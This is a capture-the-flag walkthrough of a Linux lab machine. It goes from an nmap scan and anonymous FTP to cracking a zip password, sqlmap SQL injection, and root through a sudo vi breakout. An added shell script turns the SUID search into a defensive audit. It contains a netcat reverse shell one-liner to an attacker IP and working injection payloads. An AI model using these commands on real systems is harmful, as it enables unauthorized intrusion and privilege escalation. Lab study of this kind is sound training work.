#Linux #FTP #SQL #SUID
NMAP Scan
nmap -sV -sC -p- 10.129.17.227
- To see the versions of the services running (-sV)
- To perform a script scan using the default set of scripts (-sC)
- To scan all ports from 1 through 65535 (-p-)
Open Ports
- 21/tcp open ftp vsftpd 3.0.3
- 22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
- 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
FTP
Nmap scan highlights that anonymous FTP login is allowed
We are able to download backup.zip
We have a situation here: what is the password of the zip file?
No worries, John the Ripper to the rescue!
https://github.com/openwall/john
John the Ripper jumbo - advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs
Here are the steps:
- Generate the hash of the zipfile and save it as hash
zip2john backup.zip > hash
- Use John to crack the password with a wordlist of commonly used passwords (rockyou.txt). If the password does not show up on the terminal, you can find it in john.pot
john -w=/usr/share/wordlists/rockyou.txt hash
Thanks John! We can now unzip backup.zip, which contains two files:
- index.php --> it contains a username:password pair where the password is an MD5 hash: you can look the hash up in one of the free online MD5 decrypt/encrypt services
- style.css
Using the credentials we can log in to the Car Catalogue
SQL Injection
- If you try a single quote (') inside the search box --> ERROR: unterminated quoted string at or near "'" LINE 1: Select * from cars where name ilike '%'%' ^
- If you try ' OR '1' = '1 --> No ERROR message: brings all cars as 1=1 always!
Let's use sqlmap for this lab.
https://github.com/sqlmapproject/sqlmap.git
Automatic SQL injection and database takeover tool
Here are the steps:
- Capture the GET request of a sample search with Burp Suite and save it as new.req
- Run the sqlmap tool
sqlmap -r new.req
- -r means REQUESTFILE: Load HTTP request from a file
- Run the --os-shell command
sqlmap -r new.req --os-shell
- --os-shell means prompt for an interactive operating system shell
- If asked "Do you want to retrieve the command standard output? [Y/n/a]" --> answer a (always)
- Do not forget to start the listener on the attacking machine before running the payload
- Get the reverse shell payload; revshells.com can help us here, we can try the mkfifo variant
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.26 87 >/tmp/f
- We can improve the shell and make it fully interactive using the following commands
python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL+Z
stty raw -echo
fg
export TERM=xterm
It worked!
We can now capture the user flag!
Privilege Escalation
We are trying privilege escalation by using SUID binaries. Let's start with this command:
find / -perm -4000 -type f 2>/dev/null
- / denotes that we start from the top (root) of the file system and search every directory below it
- -perm -4000 matches files whose set-UID bit (mode 4000) is set, regardless of their other permission bits
- -type states the type of file we are looking for
- f denotes a regular file, excluding directories and special files
- 2>/dev/null means we will redirect all errors to /dev/null. In other words, we will ignore all errors.
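The same find command, wrapped into a small set-UID audit that compares what it finds against a recorded baseline so that an unexpected set-UID binary stands out. This is an added example, not part of the original write-up; the directory tree and baseline below are constructed for the demo (on a real host you would scan / against a baseline recorded while the system was known-good).

```sh
# Added example (not from the original write-up): set-UID audit against a
# baseline. All paths here are constructed for the demo.

# List regular files under $1 that carry the set-UID bit, sorted for a stable
# comparison; permission errors go to /dev/null as in the write-up's command.
list_suid() {
    find "$1" -perm -4000 -type f 2>/dev/null | sort
}

# Print set-UID files under $1 that are missing from the sorted baseline $2.
# Returns 0 when the scan matches the baseline, 1 when new files appear.
new_suid() {
    found=$(list_suid "$1" | comm -13 "$2" -)
    if [ -z "$found" ]; then
        return 0
    fi
    printf '%s\n' "$found"
    return 1
}

# Constructed demo tree: one expected set-UID file, one ordinary file and one
# set-UID file dropped into a world-writable directory.
demo_root=$(mktemp -d)
mkdir -p "$demo_root/bin" "$demo_root/tmp"
: > "$demo_root/bin/expected"; chmod 4755 "$demo_root/bin/expected"
: > "$demo_root/bin/plain";    chmod 0755 "$demo_root/bin/plain"
: > "$demo_root/tmp/rogue";    chmod 4755 "$demo_root/tmp/rogue"
# Baseline: the set-UID files an administrator recorded as legitimate.
printf '%s\n' "$demo_root/bin/expected" > "$demo_root/baseline.txt"

if new_suid "$demo_root" "$demo_root/baseline.txt"; then
    echo "no unexpected set-UID files"
else
    echo "review the set-UID files listed above"
fi
```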
My shell dies after around 15 seconds. I need to find a way (if there is any) to make it more stable.
SSH Login
ssh postgres@{IP}
sudo -l
# This command shows which commands we are allowed to run with sudo
We can run a binary with sudo, but we need GTFOBins (https://gtfobins.github.io/) to see how that binary can be used to break out into a shell
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
# inside vi, type :set shell=/bin/sh and press Enter
# then type :shell and press Enter
whoami
# should be root